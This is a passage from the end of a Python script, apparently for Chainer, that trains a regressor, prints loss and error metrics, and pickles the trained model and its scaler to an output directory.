trainer.extend(E.PrintReport(['epoch', 'main/loss', 'main/mean_abs_error',
'main/root_mean_sqr_error', 'elapsed_time']))
trainer.extend(E.ProgressBar())
trainer.run()
# Save the regressor's parameters.
model_path = os.path.join(args.out, args.model_filename)
print('Saving the trained model to {}...'.format(model_path))
regressor.save_pickle(model_path, protocol=args.protocol)
# Save the standard scaler's parameters.
if scaler is not None:
with open(os.path.join(args.out, 'scaler.pkl'), mode='wb') as f:
pickle.dump(scaler, f, protocol=args.protocol)
if __name__ == '__main__':
main()
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.